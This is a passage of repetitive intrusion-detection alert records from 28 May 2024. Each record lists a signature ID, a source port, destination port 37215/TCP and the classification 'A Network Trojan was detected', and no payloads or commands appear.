                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.610349
                  SID:2835222
                  Source Port:52630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.585804
                  SID:2835222
                  Source Port:47568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316596
                  SID:2835222
                  Source Port:52998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.601637
                  SID:2835222
                  Source Port:54344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742437
                  SID:2829579
                  Source Port:52256
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.660538
                  SID:2829579
                  Source Port:42192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.592816
                  SID:2835222
                  Source Port:44224
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911136
                  SID:2829579
                  Source Port:51510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536080
                  SID:2829579
                  Source Port:51770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.767708
                  SID:2835222
                  Source Port:48792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719530
                  SID:2835222
                  Source Port:49972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.584391
                  SID:2829579
                  Source Port:33134
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790355
                  SID:2835222
                  Source Port:55936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.789876
                  SID:2835222
                  Source Port:47284
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912212
                  SID:2835222
                  Source Port:49208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.915708
                  SID:2829579
                  Source Port:57070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.555354
                  SID:2835222
                  Source Port:33920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.649875
                  SID:2829579
                  Source Port:38864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.720241
                  SID:2835222
                  Source Port:55502
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278697
                  SID:2835222
                  Source Port:41618
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489888
                  SID:2829579
                  Source Port:46960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.660582
                  SID:2829579
                  Source Port:60866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.659933
                  SID:2829579
                  Source Port:39822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.930712
                  SID:2829579
                  Source Port:52234
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.908021
                  SID:2829579
                  Source Port:54016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.673818
                  SID:2829579
                  Source Port:44816
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.781078
                  SID:2829579
                  Source Port:41500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.492406
                  SID:2835222
                  Source Port:50814
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.576902
                  SID:2829579
                  Source Port:43294
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.844808
                  SID:2829579
                  Source Port:60246
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316509
                  SID:2835222
                  Source Port:46192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695288
                  SID:2835222
                  Source Port:41938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.921780
                  SID:2829579
                  Source Port:58108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719364
                  SID:2829579
                  Source Port:45072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.817796
                  SID:2835222
                  Source Port:58136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.602386
                  SID:2835222
                  Source Port:36072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.918110
                  SID:2829579
                  Source Port:45686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.279477
                  SID:2835222
                  Source Port:36232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.622237
                  SID:2829579
                  Source Port:60208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719067
                  SID:2829579
                  Source Port:33344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790495
                  SID:2829579
                  Source Port:46938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.702578
                  SID:2829579
                  Source Port:42760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.910499
                  SID:2835222
                  Source Port:36920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.755597
                  SID:2829579
                  Source Port:55646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.576947
                  SID:2835222
                  Source Port:42542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.492480
                  SID:2829579
                  Source Port:37186
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488685
                  SID:2835222
                  Source Port:37080
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.622269
                  SID:2835222
                  Source Port:47276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.627796
                  SID:2835222
                  Source Port:49262
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.780874
                  SID:2835222
                  Source Port:50786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.659921
                  SID:2835222
                  Source Port:48390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.579014
                  SID:2835222
                  Source Port:41160
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.781105
                  SID:2835222
                  Source Port:57950
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.594434
                  SID:2829579
                  Source Port:42938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.529146
                  SID:2829579
                  Source Port:41926
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.846013
                  SID:2829579
                  Source Port:54916
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.785742
                  SID:2829579
                  Source Port:59070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.491858
                  SID:2835222
                  Source Port:42758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.296003
                  SID:2835222
                  Source Port:41282
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.844914
                  SID:2835222
                  Source Port:35510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.592925
                  SID:2835222
                  Source Port:39298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.729762
                  SID:2829579
                  Source Port:58712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.795790
                  SID:2829579
                  Source Port:47042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.745914
                  SID:2829579
                  Source Port:42060
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.585579
                  SID:2835222
                  Source Port:59740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695230
                  SID:2829579
                  Source Port:37038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651694
                  SID:2835222
                  Source Port:41544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488140
                  SID:2829579
                  Source Port:45716
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.846576
                  SID:2829579
                  Source Port:37728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886255
                  SID:2829579
                  Source Port:33318
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742627
                  SID:2835222
                  Source Port:35098
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.755579
                  SID:2829579
                  Source Port:48170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.547325
                  SID:2835222
                  Source Port:37612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.555670
                  SID:2835222
                  Source Port:35630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.650638
                  SID:2829579
                  Source Port:38468
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.726469
                  SID:2829579
                  Source Port:59762
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.649729
                  SID:2835222
                  Source Port:43146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.577021
                  SID:2835222
                  Source Port:38724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.293699
                  SID:2829579
                  Source Port:44076
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.586915
                  SID:2829579
                  Source Port:37910
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911549
                  SID:2835222
                  Source Port:35034
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.294443
                  SID:2829579
                  Source Port:44232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.888291
                  SID:2829579
                  Source Port:56248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.900443
                  SID:2829579
                  Source Port:39152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.846426
                  SID:2835222
                  Source Port:59422
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.818066
                  SID:2835222
                  Source Port:49592
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912552
                  SID:2829579
                  Source Port:38574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.789843
                  SID:2835222
                  Source Port:58436
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.586379
                  SID:2835222
                  Source Port:56476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.843867
                  SID:2829579
                  Source Port:42068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.704295
                  SID:2835222
                  Source Port:42986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.755612
                  SID:2829579
                  Source Port:34386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.870710
                  SID:2835222
                  Source Port:59032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719360
                  SID:2829579
                  Source Port:45510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788290
                  SID:2835222
                  Source Port:60610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.738142
                  SID:2835222
                  Source Port:37034
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.843786
                  SID:2829579
                  Source Port:44948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.537246
                  SID:2835222
                  Source Port:49926
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.537237
                  SID:2829579
                  Source Port:52988
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.584350
                  SID:2835222
                  Source Port:55518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.579787
                  SID:2829579
                  Source Port:35272
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.729759
                  SID:2835222
                  Source Port:51030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.483000
                  SID:2829579
                  Source Port:57322
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.555543
                  SID:2835222
                  Source Port:56454
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651258
                  SID:2835222
                  Source Port:54312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.583463
                  SID:2835222
                  Source Port:46104
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.532179
                  SID:2835222
                  Source Port:35832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.528091
                  SID:2835222
                  Source Port:57622
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.846088
                  SID:2835222
                  Source Port:39244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.927153
                  SID:2829579
                  Source Port:42804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.660591
                  SID:2835222
                  Source Port:43246
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489420
                  SID:2835222
                  Source Port:38598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.795685
                  SID:2835222
                  Source Port:37434
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.809954
                  SID:2829579
                  Source Port:44842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.817802
                  SID:2835222
                  Source Port:56592
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.673844
                  SID:2835222
                  Source Port:44524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.927056
                  SID:2835222
                  Source Port:42436
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.660549
                  SID:2835222
                  Source Port:53854
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.529307
                  SID:2835222
                  Source Port:34410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.496184
                  SID:2835222
                  Source Port:60558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.551729
                  SID:2835222
                  Source Port:60202
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.923083
                  SID:2835222
                  Source Port:51018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911651
                  SID:2829579
                  Source Port:35408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.700406
                  SID:2835222
                  Source Port:53204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.767844
                  SID:2829579
                  Source Port:55716
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.494550
                  SID:2829579
                  Source Port:41370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.737960
                  SID:2829579
                  Source Port:49838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.803718
                  SID:2829579
                  Source Port:51406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.586772
                  SID:2835222
                  Source Port:37766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887204
                  SID:2835222
                  Source Port:53746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661239
                  SID:2835222
                  Source Port:43214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.729756
                  SID:2829579
                  Source Port:33184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.649576
                  SID:2835222
                  Source Port:45668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.652053
                  SID:2835222
                  Source Port:47836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.720296
                  SID:2829579
                  Source Port:56132
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.528961
                  SID:2835222
                  Source Port:57798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.798056
                  SID:2829579
                  Source Port:52702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.543714
                  SID:2829579
                  Source Port:40880
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.720783
                  SID:2829579
                  Source Port:36204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.789480
                  SID:2835222
                  Source Port:34988
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.294451
                  SID:2829579
                  Source Port:54280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.876907
                  SID:2829579
                  Source Port:45198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.845963
                  SID:2835222
                  Source Port:49196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.544237
                  SID:2829579
                  Source Port:41748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:28.922675
                  SID:2835222
                  Source Port:45642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.809150
                  SID:2835222
                  Source Port:59062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.277322
                  SID:2835222
                  Source Port:37592
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696101
                  SID:2829579
                  Source Port:43890
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.555390
                  SID:2829579
                  Source Port:34198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.543170
                  SID:2829579
                  Source Port:36614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907944
                  SID:2835222
                  Source Port:50824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695714
                  SID:2835222
                  Source Port:43090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.277345
                  SID:2835222
                  Source Port:38332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.296953
                  SID:2829579
                  Source Port:39820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.494891
                  SID:2829579
                  Source Port:49000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.576828
                  SID:2829579
                  Source Port:33128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886576
                  SID:2829579
                  Source Port:40940
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.906933
                  SID:2829579
                  Source Port:54188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.585022
                  SID:2829579
                  Source Port:40968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.276502
                  SID:2835222
                  Source Port:43476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.650345
                  SID:2835222
                  Source Port:60866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742611
                  SID:2829579
                  Source Port:44266
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.650384
                  SID:2835222
                  Source Port:57462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.543704
                  SID:2835222
                  Source Port:52904
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.801587
                  SID:2829579
                  Source Port:44834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788875
                  SID:2829579
                  Source Port:40218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.766528
                  SID:2829579
                  Source Port:36558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.900366
                  SID:2829579
                  Source Port:44466
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.490329
                  SID:2835222
                  Source Port:51532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.881305
                  SID:2829579
                  Source Port:52358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.924461
                  SID:2835222
                  Source Port:36522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.583606
                  SID:2829579
                  Source Port:34556
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.766453
                  SID:2829579
                  Source Port:56144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886757
                  SID:2829579
                  Source Port:60296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.491397
                  SID:2835222
                  Source Port:55146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.791687
                  SID:2835222
                  Source Port:34634
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.551131
                  SID:2829579
                  Source Port:43310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.796696
                  SID:2835222
                  Source Port:56644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.656132
                  SID:2835222
                  Source Port:36106
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.492480
                  SID:2829579
                  Source Port:57346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.494677
                  SID:2829579
                  Source Port:42366
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.563526
                  SID:2829579
                  Source Port:54480
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530626
                  SID:2835222
